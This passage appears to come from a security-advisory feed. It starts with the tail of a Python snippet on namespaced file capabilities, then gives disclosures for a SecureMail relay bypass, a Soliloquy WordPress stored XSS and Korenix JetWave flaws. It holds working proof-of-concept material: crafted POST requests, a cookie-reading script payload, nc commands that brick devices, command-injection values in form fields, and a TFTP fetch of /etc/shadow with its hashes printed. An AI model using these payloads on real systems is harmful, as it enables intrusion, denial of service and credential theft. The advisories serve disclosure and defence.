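    payload = build_nscap(cap_mask(CAP_SETUID, CAP_SETGID, CAP_SYS_ADMIN), 0, 0)
    print("payload:", payload.hex())
    print("stored after cap_convert_nscap with map {0: 1000}:",
          parse_nscap(convert_nscap(payload, {0: 1000})))
    print("unmapped rootid accepted?", convert_nscap(payload, {5: 1005}) is not None)
```

With the conversion in place the stored rootid becomes 1000, so the capabilities only apply inside user namespaces rooted at that uid; without it the lower filesystem receives rootid 0 and the binary carries real-root capabilities, which is exactly what the module's check for unprivileged user namespaces is screening for.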
<pre><code>Security Advisory<br />=======================================================================<br /> title: Business Logic Bypass - Mail Relay<br /> (Post-authenticated)<br /> product: Voltage SecureMail Server<br /> vulnerable version: Voltage SecureMail Server <v7.3.0.1<br /> fixed version: Voltage SecureMail Server v7.3.0.1<br /> CVE number: CVE-2021-38130<br /> impact: Medium<br /> homepage: https://www.microfocus.com/en-us/cyberres/data-privacy-protection/secure-mail<br /> found: 2021-06-25<br /> by: TING Meng Yean (GIS Red Team)<br /> United Overseas Bank Limited (UOB)<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />Voltage SecureMail simplifies compliance to privacy regulations,<br />including MA, PCI, HITECH, UK FSA, and EU Data privacy directives,<br />and mitigates the risk of email security breaches. Voltage SecureMail<br />provides end-to-end security for email and attachments, inside the<br />enterprise to the desktop, at the enterprise gateway, and across<br />leading mobile smartphones and tablets. 
The solution provides the<br />confidence and peace of mind that sensitive data is protected in<br />transit and in storage, wherever it is in an email system to any<br />inbox (e.g., Outlook, Lotus Notes, Gmail, and Yahoo!), without<br />disrupting existing email services or business processes.<br /><br />Source: http://www.securemailworks.com/SecureMail.asp<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch and users of this product are urged to<br />upgrade to the latest version available.<br /><br />Reference: https://portal.microfocus.com/s/article/KM000003667<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected by further security<br />issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Business Logic Bypass - Mail Relay (Post-authenticated)<br />- CVE: CVE-2021-38130<br />- CWE-284: Improper Access Control<br />- CVSSv3: 5.4 (Medium)<br />https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N<br /><br /><br />Voltage SecureMail is an email protection service that provides email<br />encryption. With each secure email, there is an HTML attachment named<br />"message_zdm.html" that furnishes access to the Zero Download Messenger<br />(ZDM), which can be a web portal or mobile app. 
The encrypted body of<br />the original message as well as any attachments to the original email<br />are contained within this attachment.<br /><br />The email recipient needs to install the Voltage SecureMail app (for mobile) or<br />browse to the Voltage SecureMail Server portal (desktop) to authenticate and<br />view any secure email and attachments sent via ZDM.<br /><br />When the recipient opens the "message_zdm.html" file for the first time<br />on a desktop, the browser is brought to the corporation's SecureMail<br />portal where the user has to create a password in order to continue.<br /><br />A verification email containing a one-time link is sent to the recipient,<br />and the recipient can read the message on the SecureMail portal after clicking<br />the link.<br /><br />If the recipient opens the "message_zdm.html" file again in the future,<br />the recipient has to enter the previously created password.<br /><br />When viewing the email on the SecureMail portal, the recipient can<br />choose to reply to the email by clicking "Reply" or "Reply to All".<br />The SecureMail portal only allows the recipient to reply to the<br />original email sender and to the email addresses in the Cc/Bcc list.<br />However, it is possible to modify the original email addresses in the<br />"to", "cc" or "bcc" fields, or to add arbitrary email addresses, by<br />sending a crafted POST request.<br /><br />As the SecureMail portal displays the logo and valid SSL certificate of<br />the corporation in use, an attacker who has previously received a SecureMail<br />encrypted email can make use of the SecureMail portal to send phishing<br />emails to third parties. Note that the attacker is unable to spoof<br />the "from" address, so the emails to third parties will be from the<br />attacker's email address.<br /><br /><br />Proof of concept:<br />-----------------<br />When the recipient replies to the email by clicking "Reply" or "Reply to All", the<br />recipient is brought to the "Compose New Message" page. To send the email reply,<br />the recipient then clicks on the "Send Secure" button.<br /><br />The SecureMail portal does not allow the modification of the "to", "cc" or<br />"bcc" field if the user intercepts the POST request sent after<br />clicking on the "Send Secure" button.<br /><br />However, if the user intercepts the POST request sent after<br />clicking on the "Plain Text" button, the modification of the "to", "cc" or<br />"bcc" field is successful.<br /><br />The modified email is then successfully sent out after the user<br />clicks on the "Send Secure" button.<br /><br />The one difference between the "Send Secure" and "Plain Text" POST requests<br />that allows the "to", "cc" and "bcc" fields to be modified is the "send"<br />versus "x" parameter: the recipient fields are only validated when "send" is present.<br />The rest of the contents of the "Send Secure" and "Plain Text"<br />POST requests are almost identical.<br /><br /><br /><br />Original "Send Secure" Request<br />########################################################################<br />POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1<br />Host: <...snipped...><br />Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...><br />Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372<br />Te: trailers<br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="CSRFToken"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="c"<br /><br />c3<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="h"<br /><br />h924481124<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="send"<br /><br />send<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="senderKeyEnc"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="to"<br /><br />original.sender@corp.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="showCcEnabled"<br /><br />on<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="cc"<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="bcc"<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="subject"<br /><br />RE: <...snipped...><br 
/>-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="attachment"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="editModeToggle"<br /><br />0<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="body"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />########################################################################<br /><br /><br /><br /><br />Modified "Plain Text" request<br />########################################################################<br />POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1<br />Host: <...snipped...><br />Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...><br />Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372<br />Te: trailers<br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="CSRFToken"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="c"<br /><br />c3<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="h"<br /><br />h924481124<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="x"<br /><br />x<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="senderKeyEnc"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="to"<br /><br />victim1@external.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: 
form-data; name="showCcEnabled"<br /><br />on<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="cc"<br /><br />victim2@external.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="bcc"<br /><br />victim3@external.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="subject"<br /><br />RE: <...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="attachment"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="editModeToggle"<br /><br />1<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="body"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372--<br />########################################################################<br /><br /><br />As of the patched Voltage SecureMail Server version 7.3.0-259490, the<br />vulnerability was no longer reproducible via the "Plain Text" button. 
However, the same<br />vulnerability can be replicated using the "Attach" function.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* 7.3<br />* 7.3.0-259490<br /><br /><br />Vendor contact timeline (GMT+8):<br />--------------------------------<br />2021-06-25: Contacting vendor through their SecureMail product support team.<br />2021-06-28: Contacting Micro Focus Product Security Response Team (PSRT)<br /> security@microfocus.com to request for CVE number.<br />2021-06-29: Micro Focus PSRT opened PSRT case 80358.<br />2021-07-02: SecureMail product support team confirmed the vulnerability and<br /> working on patch.<br />2021-07-31: SecureMail product support team released test patch v7.3.0-259490.<br />2021-08-04: Confirmed vulnerability "Plain Text" function was no longer<br /> replicable, but the same vulnerability can be replicated using the<br /> "Attach" function. Notified the SecureMail product support team.<br />2021-11-11: SecureMail product support team released patch v7.3.0.1.<br />2022-01-21: Requested Micro Focus PSRT for updates.<br />2022-01-24: Micro Focus PSRT responded with assigned CVE number.<br />2022-01-29: Micro Focus PSRT published security bulletin.<br />2022-02-03: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />According to the vendor, Voltage SecureMail resolved this vulnerability<br />in the version 7.3.0.1 patch release and customers should contact their support<br />representative for information about downloading and applying the patch.<br /><br /><br />Security Bulletin URL:<br />----------------------<br />https://portal.microfocus.com/s/article/KM000003667<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Meng Yean TING (GIS Red Team)<br />United Overseas Bank Limited (UOB)<br /><br />-----BEGIN PGP PUBLIC KEY BLOCK-----<br /><br 
/>mQINBF5OZxUBEADpXPnK42+IIN4t2oP23y/9jaOsLT8jkfvAIjT1pnbhbI/wSTla<br />e+Lm6f64YPrFuvZgcAMLTv4gIXrhnwHYn6J5d56e9cnsZ4fuIw1fIAqivjGxJqDL<br />FtvIptzpfn9CbXsQViR6AJY6CffOs9Lm/UN/LbZCBLPmJTOXkGqw/vfkBRZwwcbH<br />352tS85UXc0C+EAXhfQj34AkfIHR+O02JU+pP/obdKoxXC3GcHRBOqI9JaV1Qehv<br />Xyl04rbGLssIjx9Bi3+f7dis4SfQpt157pnZetcWQRGM0/EvGtLT/zrYwueNI6qU<br />XVoKqGWPUJEfVaA6f+iVpj0Jv4uy4t4vo5MKcVtQY7RY00T1cCNeBxRW8MqYGubT<br />j3NiUndOu3V1FlX9kerTYJEigxVzvB9t9LuYOlqEBfhsU5x0L60o2/M9Max81yg1<br />93jDPDflCHhQqc2f2hHHJPYnXQceomlaD+CIHxxa5vWwTl6pPNkuSOBTw5A5FAMu<br />HJLFJnAPuTp4hXAS6fjs827jpJd9L6xN/sXj+CLJuDvREAYI7cVhTByT3GjWfGUT<br />754cJU+frd08FuLHbMLjp+d2ybGT53sHj5LDJrV/YRSjmzHniEhRM8OucIbl+k/n<br />lBtHxlMUmXBIodj7D0acW4m+pEMI7xsHKRLjuwAXi88oaRhKCn2nLMJTcwARAQAB<br />tCtUSU5HIE1lbmcgWWVhbiA8VGluZy5NZW5nWWVhbkB1b2Jncm91cC5jb20+iQJU<br />BBMBCAA+FiEEqd3a+A8bLZBoo4of7xtCbb3H/4cFAl5OZxUCGyMFCRLPlKsFCwkI<br />BwIGFQoJCAsCBBYCAwECHgECF4AACgkQ7xtCbb3H/4fivhAA3oRlhncZzXcm+tVO<br />0atU1i7HcHjWOUtgzSV3E17C4Fi3cpkoLtuDjAcNdLWyX3ofcKUnVm6Pna9xbWJ0<br />h21BYwoScVZMKm7IGMsk2Ovfn6zVNVgKxJ+CkD+dePLKv1iIXHAmU+G9ddgKhDrf<br />4C1w/0mwd8gVay+tN5h57XlfaDoOVW846yRXX+imBrwW4oZWRL4Pt2e4cW7p9Ngu<br />O5lIJiossLjIrHSKIdQ2AYX1ufjHjoBbp/rQJ9vNp40EPz9L46dRTlu7DYk4CwI+<br />0Fd7HhZ0puMgTSPUXLHIiORzmAzyiy9BHLRJBBLQzkg9i6LQCNtD/xByILFCg0dH<br />fuZf2rgNq3GGDfFd9PIEqHNVd4B7a8b/wgRracsIHbGG6sk3iMa/Dm4vp35A35pR<br />q15FVtMS3cJoEs55jAowrE6FnZ/PBNjlejxOqQMlfcESdzRf18+ywAxce0R/Y0Cx<br />L9X017vewYm+f9VqTO51Scq+fq/9QIGvi85+YLx9SZ6mqqRmoKWH5MefNQoGgM5U<br />Jb2hSJVXqhREd3ZaRb/+UZ964Yf8F7xIoI+kQUMwOJPGjmLm1yMklfNcDMGiiM5Z<br />Igw9F0gut10VrNrY3SJJraOa+IdX2t3tFlKwJdC1W50E5cUR6y9UMu/7Q+f+3o6T<br />CMdqiXxJ7JuSWHRKA1iAQ3lxAsu5Ag0EXk5nFQEQAOG5Ypef8P/Omtv6HghvcLCK<br />8EJ5R+99O+YFS0EuuSSZ3yReB7ImWg7RKx4Xwnr3LrKzcdVvgERwWoiXFi7F2736<br />hqvfjwBbwJw1iBTcnKF5uEhafjDHfM/mhMt/bMrJPBX4dee9D0TahuV/cgRqORXu<br />0dj6z6cNrFeZS+fgAgbVlAkvvtiPgT8SCGyBDQntYBYo631fkSS9GrfOb5curH9y<br 
/>xRb+yugWP+bSWNWMEGfs+SQi90a28Te1NzOoca3hhgcjv1lZQkMmKtg91jPqxRHd<br />JPul1IhYPBEE0yLrP845KwGyoM/4Zd+wSxjdmgOP/bULflXiGff2doVdoVTPo3wK<br />zQxIQ2/3X50Dlnc4oDN2R8fvph1HP3VdweJ0r3PsPNcfRa7ckgmogHX5ISGNnSr5<br />qbm/V5Y11Pm9BnTCOz32cDD2sB7d9u58PD4c0IUDCYK0rMQ8r4Bhbmt3NeXO7V4O<br />o4p7BZIuJYH8wz4Q/dPNS7EHacg9iOzbDJk95frzkwSLu8rUQCByDNJaARaaVpMM<br />kdGzWFw7s/vbuRoyBSI4R2xAM8Ze9njFZDowXrImPJaFhlAF40JUbL5I85dVeQSd<br />dtd2A7h2dTktgKe0+jFgGNbOwQT9z7ziY0jzd2xcIgXDL+O95nfy0aaiIWL+8AN/<br />IsVj3qnkQjPOLTecrndxABEBAAGJAjwEGAEIACYWIQSp3dr4DxstkGijih/vG0Jt<br />vcf/hwUCXk5nFQIbDAUJEs+UqwAKCRDvG0Jtvcf/h9mpEADJZ/N8J8MXCmnp0oHQ<br />VNc/M1IhNJZhOmlJdqV+PQVHe8FFJv924avh4Nh6nX+U7Qx7uX7DC82BsLhx3rui<br />5HWzHt/x7ORegwYBz7frvlApT1IF84wLpGBV+rJnC1kscHv5iQN9OEtOAlcvoz2l<br />7d0aXs+/x5ueJol9Psu1xcwOyjili21Ucu7GAwAPRzyK9IMhgKPW/w1yD8ADUIxu<br />Uzg8Qy9bIElPMlaw5m1hHmEbDUF/2kxYPnfvF4AAaff1jSFhJHwTNzploI5nNnT6<br />vm/waE/rwpbDlsTZ5lKan4UJvwQuG5R8aEegNpllD3/2Yhk8/8CEkuGRM5UfNDRM<br />bhH4WG6jy1xGzSvjQughoUt8xlXJhJD+AeCCwukWmkNK160jDZNN5aG2iUgoMXOM<br />pFhSdLOa8Q+4yu+/2LaPnBSElTbSXpgqA7aTyxrfl5yhLF/FKDI/zDhVMmSNuvAr<br />cGBbNjfZflaeJmdFXMSU3a3makS3utMyiHl7BNrwjzHVjWpqvLdo9Jyb3vIpOKO3<br />3mH9yER0ML0lrHXrLZCbgHDXp8Vktuxh8eDE3R/A1YUOTK95sODwbU42skn0V4cf<br />h9aNDpszjqbaniHOdnwLL8yof6Q8Ldn2Wxp8MkcTtdWBzNT6sD3D9AfsS0ikxddM<br />JMIzsDM4+GTLxyZrv4jCloLk9g==<br />=nECi<br />-----END PGP PUBLIC KEY BLOCK-----<br />UOB EMAIL DISCLAIMER<br />Any person receiving this email and any attachment(s) contained,<br />shall treat the information as confidential and not misuse, copy,<br />disclose, distribute or retain the information in any way that<br />amounts to a breach of confidentiality. If you are not the intended<br />recipient, please delete all copies of this email from your computer<br />system. As the integrity of this message cannot be guaranteed,<br />neither UOB nor any entity in the UOB Group shall be responsible for<br />the contents. 
Any opinion in this email may not necessarily represent<br />the opinion of UOB or any entity in the UOB Group.<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 02/12/2021<br /># Exploit Author: Abdurrahman Erkan (@erknabd)<br /># Vendor Homepage: https://soliloquywp.com/<br /># Software Link: https://wordpress.org/plugins/soliloquy-lite/<br /># Version: 2.6.2<br /># Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2<br /><br /># Proof of Concept:<br />#<br /># 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.<br /># 2- Open Soliloquy and use the "Add New" button to create a new post.<br /># 3- Put the payload into the title field. Payload: <script>alert(document.cookie)</script><br /># 4- Add any image to the post.<br /># 5- Publish the post.<br /># 6- The payload is stored with the post and executes wherever the title is rendered:<br />#<br /># Opening "http://localhost/wp-admin/post.php?post=1&action=edit" triggers the XSS (for logged-in WordPress users).<br /># Opening "http://localhost/?post_type=soliloquy&p=1" triggers the XSS (for unauthenticated visitors).<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220131-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: Korenix Technology JetWave products:<br /> JetWave 2212X, JetWave 2212S, JetWave 2212G,<br /> JetWave 2311, JetWave 3220<br /> vulnerable version: See "Vulnerable / tested versions"<br /> fixed version: See "Solution"<br /> CVE number: CVE-2020-12500, CVE-2020-12501, CVE-2020-12502,<br /> CVE-2020-12503, CVE-2020-12504, CVE-2021-39280<br /> impact: Critical<br /> homepage: https://www.korenix.com/<br /> found: 2020-04-06<br /> by: T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />[...]<br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, and Transportation. 
Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners."<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides updated firmware which should be installed immediately.<br /><br />SEC Consult recommends performing a thorough security review, conducted by<br />security professionals, to identify and resolve potential further critical<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Unauthenticated Device Administration (CVE-2020-12500)<br />Korenix, Westermo (members of the Beijer Group) and Comtrol (Pepperl+Fuchs)<br />share a partially similar firmware base for their industrial devices. The<br />devices can be managed via a Windows client program called "Korenix View" or<br />"Jet View".<br /><br />This program communicates in plaintext via UDP. All messages that are sent to<br />the device are broadcast to the whole subnet, and the answers from the devices<br />are sent back via broadcast as well.<br />The older version of the management daemon, called "cmd-server2", can be<br />controlled without a password. Analyzing the newer version, called<br />"jetviewd", indicates that some kind of password can be set. 
But this is not<br />part of the default configuration.<br /><br />Actions that can be performed via this daemon, listening on UDP port 5010, are:<br /> * Modifying network settings (IP, netmask, gateway)<br /> * Initiating self tests and blinking the LEDs on the device<br /> * Triggering download and upload of configuration files (via TFTP)<br /> * Triggering uploads of new firmware and bootloader files (via TFTP)<br /><br />The device can also be bricked via this daemon, so that it is necessary to press<br />the reset button and re-configure the settings.<br /><br /><br />2) Cross-Site Request Forgery (CSRF) (CVE-2020-12502)<br />The web interface, which is used to set all configuration options, is vulnerable<br />to cross-site request forgery. An attacker can change settings by luring an<br />authenticated victim to a malicious website.<br /><br /><br />3) Multiple Authenticated Command Injections (CVE-2020-12503)<br />Multiple command injection vulnerabilities were found on the device series<br />"JetWave".<br /><br />These devices partially share the same firmware base; therefore, the payloads to<br />exploit the command injections are similar. Due to the lack of CSRF<br />protection, an attacker can execute arbitrary commands on the device by luring<br />the victim into clicking a malicious link.<br /><br /><br />4) Hidden OS Web-Shell Interface (CVE-2021-39280)<br />The endpoint /syscmd.asp in the web interface of the devices contains an<br />undocumented web shell that can be used to invoke system commands as root<br />after authentication.<br /><br />It seems that this is part of the SDK used and a leftover artifact.<br /><br />In combination with the missing CSRF protection, this vulnerability poses a<br />higher risk.<br /><br /><br />5) Arbitrary Unauthenticated TFTP Actions (CVE-2020-12504)<br />A TFTP service is present on a broad range of devices for firmware,<br />bootloader, and configuration uploads/downloads. 
This TFTP server can be<br />abused to read any file from the system, as the daemon runs as root; among<br />other things this exposes the password hashes (see the /etc/shadow dump in the<br />proof of concept). Write access is restricted to certain files (configuration,<br />certificates, boot loader, firmware upgrade) though.<br /><br />By uploading a malicious Quagga configuration file, an attacker can modify, e.g.,<br />the IP settings of the device. Malicious firmware and bootloader uploads are<br />possible too.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Unauthenticated Device Administration (CVE-2020-12500)<br />All commands can be sent via UDP port 5010.<br /><br />Device discovery (firmware/bootloader version etc. in response):<br />echo -e "\x00\x00\x00\x07\x00\x00\x00\x04\x00\x00\x00\x01" | nc -u $IP 5010<br /><br />Blink the LEDs:<br />echo -e "\x00\x00\x00\x5b\x00\x00\x00\x01\x01" | nc -u $IP 5010<br /><br />Permanent denial of service; the device only becomes reachable again after<br />pressing the reset button to load the default configuration:<br />echo -e "\x00\x00\x00\x1f\x01\x01\x01\x04\x01\x01\x01\x01" | nc -u $IP 5010<br /><br />Present on:<br /> * Korenix JetWave (Multiple devices)<br /><br /><br />2) Cross-Site Request Forgery (CSRF) (CVE-2020-12502)<br />The following CSRF PoC can be used to ping 127.0.0.1. 
All other actions in the<br />context of the menu, like uploading config files, can be done in the same way:<br />-------------------------------------------------------------------------------<br /><html><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://$IP/goform/formping" method="POST"><br /> <input type="hidden" name="PingIPAddress" value="127.0.0.1" /><br /> <input type="hidden" name="submit-url" value="/toolping.asp" /><br /> <input type="hidden" name="Submit" value="Ping" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />-------------------------------------------------------------------------------<br /><br /><br />3) Multiple Authenticated Command Injections (CVE-2020-12503)<br />At least two command injections are present in the default web interface. It is<br />likely that more such vulnerabilities are present on the device.<br /><br />3.1) Semi-Blind Command Injection<br />The following command injection works on the devices:<br /> * Korenix JetWave (Multiple devices)<br /><br />The ping functionality in the web interface can be abused to inject system<br />commands in a semi-blind way. 
Two requests must be sent to the service to<br />retrieve the output of the command injection.<br /><br />The first request is a POST request to the endpoint /goform/formping:<br />-------------------------------------------------------------------------------<br />POST /goform/formping HTTP/1.1<br />Host: $IP<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 57<br />Connection: close<br />Cookie: -common-web-session-=::webs.session::9c10b4b1b22063e7fcba5369ff86e779<br />Upgrade-Insecure-Requests: 1<br /><br />PingIPAddress=;id;&submit-url=%2Ftoolping.asp&Submit=Ping<br />-------------------------------------------------------------------------------<br />This request triggers the actual command injection in a blind way. The output<br />can be fetched from the system by using the following GET request after<br />triggering the previous POST request:<br />-------------------------------------------------------------------------------<br />GET //toolping.asp HTTP/1.1<br />Host: $IP<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: -common-web-session-=::webs.session::9c10b4b1b22063e7fcba5369ff86e779<br />Upgrade-Insecure-Requests: 1<br />-------------------------------------------------------------------------------<br /><br /><br />3.2) Blind Command Injection<br />The following command injection works on the devices:<br /> * Korenix JetWave (Multiple devices)<br /><br />The configuration upload via TFTP in the web interface can be abused to inject<br />system commands in a blind way.<br /><br />The request is a POST request to the endpoint /goform/formTFTPLoadSave:<br />-------------------------------------------------------------------------------<br />POST 
/goform/formTFTPLoadSave HTTP/1.1<br />Host: $IP<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 121<br />Connection: close<br />Cookie: ui_language=en_US; -common-web-session-=::webs.session::f6070212ccae758d7d247fb8e2c52cd7<br />Upgrade-Insecure-Requests: 1<br /><br />submit-url=%2Fmgmtsaveconf.asp&ip_address=127.0.0.1;ping 192.168.1.1;&file_name=ap.conf&tftp_action=load&tftp_config=Submit<br />-------------------------------------------------------------------------------<br /><br /><br />4) Hidden OS Web-Shell Interface (CVE-2021-39280)<br />The endpoint /syscmd.asp can be accessed after successful login. It can be used<br />to execute system commands directly as root.<br /><br />Present on:<br /> * Korenix JetWave 2212X<br /> * Korenix JetWave 2212S<br /> * Korenix JetWave 2212G<br /> * Korenix JetWave 2311<br /> * Korenix JetWave 3220<br /> * Korenix JetWave 3420<br /><br /><br />5) Arbitrary TFTP Actions (CVE-2020-12504)<br />The Linux TFTP client was used to download files from the system using<br />absolute paths. 
Uploads were only possible to existing paths like:<br />/home/Quagga.conf<br />/home/bootloader.bin<br /><br />To download the /etc/shadow file from the system (the daemon runs as root, so<br />any other file can be fetched the same way), the following command was invoked:<br /><br />[user@localhost ~]$ tftp -m binary <Target-IP> -c get /etc/shadow<br />[user@localhost ~]$ cat shadow<br />root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />bin::10933:0:99999:7:::<br />daemon::10933:0:99999:7:::<br />adm::10933:0:99999:7:::<br />lp:*:10933:0:99999:7:::<br />sync:*:10933:0:99999:7:::<br />shutdown:*:10933:0:99999:7:::<br />halt:*:10933:0:99999:7:::<br />uucp:*:10933:0:99999:7:::<br />operator:*:10933:0:99999:7:::<br />nobody::10933:0:99999:7:::<br />ap71::10933:0:99999:7:::<br /><br />Note that "root" and "Admin" carry the identical MD5-crypt hash, i.e. the same<br />password, and that several accounts have an empty password field.<br /><br />Present on:<br /> * Korenix JetWave (Multiple devices)<br /><br />The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an<br />emulated device by using the MEDUSA scalable firmware runtime.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following firmware versions have been identified to be vulnerable:<br /> * Korenix JetWave 2212X / 1.5<br /> * Korenix JetWave 2212S / 1.5<br /> * Korenix JetWave 2212G / 1.4<br /> * Korenix JetWave 3220 / 1.2<br /> * Korenix JetWave 3420 / 1.1.3T<br /> * Korenix JetWave 2311 / 1.2 (EOL now)<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2020-04-14: Contacting CERT@VDE through info@cert.vde.com and requested support<br /> for the disclosure process due to the involvement of multiple<br /> vendors.<br />2020-04-15: Security contact responded that the products were developed by<br /> Korenix Technologies.<br />2020-04-30: Security contact informed us that some vulnerabilities were<br /> confirmed by the vendor.<br />2020-07-30: Call with Pepperl+Fuchs contact. 
Contact stated that the<br /> vulnerabilities were reported to Korenix.<br />2020-09-29: Call with Pepperl+Fuchs and CERT@VDE regarding status.<br /> Pepperl+Fuchs stated that they only have a sales contact at<br /> Korenix.<br />2020-10-05: Coordinated release of SA-20201005-0.<br />2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated<br /> that no case regarding the vulnerabilities had been opened and created one.<br /> The product owners of Westermo, Korenix and Beijer Electronics were<br /> informed via this inquiry. Set disclosure date to 2020-11-25.<br />2020-10-06: Restarted the whole responsible disclosure process by sending a<br /> request to the new security contact cs@beijerelectronics.com.<br />2020-10-07: Received an email from a Korenix representative who offered to<br /> answer questions about product security. Started responsible<br /> disclosure by requesting an email certificate or whether plaintext can be<br /> used. Referred to the request to cs@beijerelectronics.com.<br /> No answer.<br />2020-11-11: Asked the representatives of Korenix and Beijer regarding the<br /> status.<br /> No answer.<br />2020-11-25: Phone call with security manager of Beijer. Sent advisories via<br /> encrypted archive to cs@beijerelectronics.com. Received<br /> confirmation of advisory receipt. Security manager told us that he<br /> can provide information regarding the time-line for the patches<br /> within the next two weeks.<br />2020-12-09: Asked for an update.<br />2020-12-18: Call with security manager of Beijer. Vendor presented initial<br /> analysis done by the affected companies.<br />2021-03-21: Security manager invited SEC Consult to have a status meeting.<br />2021-03-26: Agreed on an advisory split as other affected products will get<br /> patched later.<br />2021-04-12: Performed advisory split.<br />2021-05-26: Meeting regarding advisory publication. 
